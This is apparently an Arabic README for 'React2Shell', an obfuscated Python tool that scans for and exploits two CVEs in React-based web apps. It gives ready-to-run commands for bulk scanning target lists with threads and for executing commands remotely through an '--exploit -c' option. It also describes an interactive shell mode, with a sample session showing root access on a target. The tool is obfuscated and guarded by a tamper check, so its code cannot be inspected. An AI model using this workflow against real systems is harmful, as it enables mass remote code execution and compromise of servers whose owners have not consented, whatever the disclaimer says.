
React2Shell - CVE-2025-55182 & CVE-2025-66478
المؤلف: LAKSHMIKANTHAN K (letchupkt)
إنستغرام: @letchu_pkt
الإصدار: 2.0.0 (مبهم)
التاريخ: 2025-12-07
python react2shell.py
هذا كل شيء! سيقوم الماسح الضوئي بـ:
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
في كل مرة تقوم فيها بتشغيل الماسح الضوئي، يقوم تلقائياً بـ:
إذا حاول شخص ما تعديل الكود المبهم:
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
سيرفض الماسح الضوئي التشغيل إذا اكتشف أي تلاعب.
جميع الميزات الأصلية محفوظة بنسبة 100% :
python react2shell.py -u https://example.com
المخرجات:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
جلسة الصدفة:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
هذه الأداة مخصصة لاختبار الأمان المصرح به فقط!
✅ تطبيقاتك الخاصة
✅ اختبارات الاختراق المصرح بها
✅ برامج مكافآت الثغرات (ضمن النطاق)
✅ بحث أمني (مصرح به)
❌ المسح غير المصرح به
❌ الاستغلال غير المصرح به
❌ أي نشاط غير قانوني
❌ انتهاك شروط الخدمة
المؤلف (LAKSHMIKANTHAN K) ليس مسؤولاً عن سوء استخدام هذه الأداة. المستخدمون وحدهم المسؤولون عن أفعالهم ويجب عليهم الامتثال لجميع القوانين المعمول بها.
السبب: الملف تالف
الحل: قم بتنزيل نسخة جديدة
السبب: تم تعديل الملف
الحل: قم بتنزيل نسخة جديدة (لا تقم بتعديل الملف)
السبب: التبعيات المفقودة
الحل:
pip install requests urllib3
السبب: عبء فك الضغط (ضئيل)
ملاحظة: يحدث مرة واحدة فقط عند بدء التشغيل، ثم يعمل بكامل سرعته
ج: الكود مبهم ومضغوط. يمكنك استخدام النسخة الأصلية غير المبهمة إذا كنت بحاجة لقراءة الكود.
ج: تأثير ضئيل. هناك تأخير بسيط عند بدء التشغيل لفك الضغط (~0.1 ثانية)، ثم يعمل بكامل سرعته.
ج: لا. أي تعديل سيكسر فحص السلامة وسيرفض الماسح الضوئي التشغيل.
ج: الإبهام ليس تشفيراً. لا يزال المهاجمون العازمون قادرين على الهندسة العكسية، لكنه صعب جداً ويستغرق وقتاً.
ج: اتصل بالمؤلف على إنستغرام: @letchu_pkt
الاسم: LAKSHMIKANTHAN K (letchupkt)
إنستغرام: @letchu_pkt
إذا واجهت مشكلات:
pip install requests urllib3
python react2shell.py
اختر من القائمة التفاعلية أو استخدم وضع CLI.
اتبع المطالبات أو قدم وسائط سطر الأوامر.
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
إنستغرام: @letchu_pkt
شكراً لاستخدامك ماسح CVE الضوئي! 🚀
الإصدار: 2.0.0 (مبهم)
التاريخ: 2025-12-07
الترخيص: لاختبار الأمان المصرح به فقط